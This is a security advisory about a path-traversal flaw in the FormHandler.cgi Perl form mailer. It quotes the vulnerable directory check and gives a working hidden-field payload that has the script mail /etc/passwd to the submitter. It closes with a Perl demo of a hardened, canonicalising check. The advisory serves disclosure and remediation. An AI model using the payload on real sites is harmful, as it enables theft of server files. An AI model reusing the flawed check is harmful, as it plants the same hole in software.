COMMAND
FormHandler.cgi
SYSTEMS AFFECTED
Sites running the CGI above
PROBLEM
Mnemonix found the following. FormHandler.cgi, available from
http://www.cgi-perl.com/programs/FormHandler, takes the filesystem
paths of templates, attachments and so on from fields hard-coded in
the submitted form, so sensitive files such as /etc/passwd can be
read by saving a copy of a site's form, editing those paths and
submitting it.
Concrete example (formhandler.cgi v2.0): you can retrieve ANY file
that the web server user (nobody) has read permission on by having
the script attach it to the reply mail. The relevant code:
@ALLOWED_ATTACH_DIRS = ('all');      # hmm, nice defaults ;)
@RESTRICTED_ATTACH_DIRS = ('/etc/');
[...]
# check whether the file may be sent, then queue it as an attachment
if (&valid_directory($filename)) {
    push(@files, $filename); [...]
}
[...]
sub valid_directory {
    local ($filename) = $_[0];
    local ($allowed_path, $restricted_path);
    local ($valid_dir) = 0;
    if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
    else {
        foreach $allowed_path (@ALLOWED_ATTACH_DIRS) {
            # silly: the configured directory is used as a regex and
            # prefix-matched against the raw, uncanonicalised path
            $valid_dir = ($filename =~ /^$allowed_path/);
            last if $valid_dir;
        }
    }
    foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) {
        # once more; note this overwrites whatever the allow-list decided
        $valid_dir = ($filename !~ /^$restricted_path/);
        last if !$valid_dir;
    }
    return $valid_dir;
}
[...]
How to download /etc/passwd? Just add this to the form:
<INPUT TYPE="hidden" NAME="reply_message_attach" VALUE="text:/tmp/../etc/passwd">
... and voila, now wait for /etc/passwd to arrive in your mailbox.
The check only looks at the uncanonicalised string, which begins
with /tmp/ rather than /etc/, so the '..' is never noticed.
Exactly the same works if @ALLOWED_ATTACH_DIRS is not set to "all":
the restricted-path loop overwrites the result of the allowed-path
loop, so any file outside /etc/ passes regardless of the allow-list,
and the /tmp/../ prefix takes care of /etc/. Trivial, isn't it?
Kevin Hemenway stated that you could add '..' to
@RESTRICTED_ATTACH_DIRS. This is incorrect and actually breaks the
'email_template' feature (and possibly others): the entry is used as
a regex, and /^../ matches any name of two or more characters, so
every file is rejected. You can however use the following:
@RESTRICTED_ATTACH_DIRS = ('/etc/','\.\.');
This made 'email_template' work again, but could have broken
something else. Note also that the check anchors the pattern at the
start of the filename, so '\.\.' only rejects names that begin with
'..'; /tmp/../etc/passwd still passes it.
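The following is an added example for this advisory, not code from FormHandler.cgi or from the people quoted above. It reproduces the quoted prefix-regex check under strict/warnings next to a canonicalising replacement, and runs both against the attack string from the form above and against a legitimate file. The allow-list value '/tmp/', the "type:path" layout of the field value, the function name valid_directory_hardened and the temporary file are assumptions made for the demonstration.

```perl
#!/usr/bin/perl
# Added example, not FormHandler.cgi code: the quoted prefix-regex check
# beside a canonicalising replacement. Configuration values, the
# "type:path" field format and the temp file are demo assumptions.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;

# Constructed configuration: a real allow-list instead of the shipped 'all'.
my @ALLOWED_ATTACH_DIRS    = ('/tmp/');
my @RESTRICTED_ATTACH_DIRS = ('/etc/');

# The check as quoted in the advisory. Both loops run the configured
# directory as a regex against the raw filename, so "/tmp/../etc/passwd"
# starts with "/tmp/" and not with "/etc/", and is accepted.
sub valid_directory_original {
    my ($filename) = @_;
    my $valid_dir = 0;
    if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
    else {
        foreach my $allowed_path (@ALLOWED_ATTACH_DIRS) {
            $valid_dir = ($filename =~ /^$allowed_path/);
            last if $valid_dir;
        }
    }
    foreach my $restricted_path (@RESTRICTED_ATTACH_DIRS) {
        $valid_dir = ($filename !~ /^$restricted_path/);  # overwrites the allow-list result
        last if !$valid_dir;
    }
    return $valid_dir ? 1 : 0;
}

# Hardened replacement (assumed name). Resolve the path first, then compare
# canonical directory prefixes as strings, not as regexes.
sub valid_directory_hardened {
    my ($filename) = @_;
    return 0 unless File::Spec->file_name_is_absolute($filename);
    # An allow-list is mandatory; the 'all' wildcard is refused outright.
    return 0 if !@ALLOWED_ATTACH_DIRS || grep { /^all$/i } @ALLOWED_ATTACH_DIRS;
    # realpath() collapses "." and ".." and follows symlinks; it returns
    # undef for a non-existent file, which is also treated as a rejection.
    my $real = realpath($filename);
    return 0 unless defined $real;

    my $under_allowed = 0;
    for my $dir (@ALLOWED_ATTACH_DIRS) {
        my $canon = canonical_dir($dir);
        if (defined $canon && index($real, $canon) == 0) { $under_allowed = 1; last }
    }
    return 0 unless $under_allowed;
    for my $dir (@RESTRICTED_ATTACH_DIRS) {
        my $canon = canonical_dir($dir);
        return 0 if defined $canon && index($real, $canon) == 0;
    }
    return 1;
}

# Canonical form of a configured directory with a trailing slash, so that
# "/tmp/" does not also match "/tmpfoo/".
sub canonical_dir {
    my ($dir) = @_;
    my $canon = realpath($dir);
    return undef unless defined $canon;
    $canon .= '/' unless $canon =~ m{/\z};
    return $canon;
}

# Demonstration on constructed inputs: the advisory's attack string and a
# file created here so that realpath() can resolve it.
my $legit = "/tmp/formhandler_demo_$$.txt";
open(my $fh, '>', $legit) or die "cannot create $legit: $!";
print $fh "hello\n";
close $fh;

for my $value ('text:/tmp/../etc/passwd', "text:$legit") {
    my (undef, $path) = split /:/, $value, 2;   # field value is "type:path"
    printf "%-40s original=%d hardened=%d\n", $path,
        valid_directory_original($path), valid_directory_hardened($path);
}
unlink $legit;
```

The point of the replacement is that the decision is made on the resolved path, so '..' segments and symlinks planted under an allowed directory are both caught, the allow-list can no longer be overridden by the restricted-list loop, and a configured directory is never interpreted as a regular expression.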
SOLUTION
Nothing yet, and none appears to be forthcoming.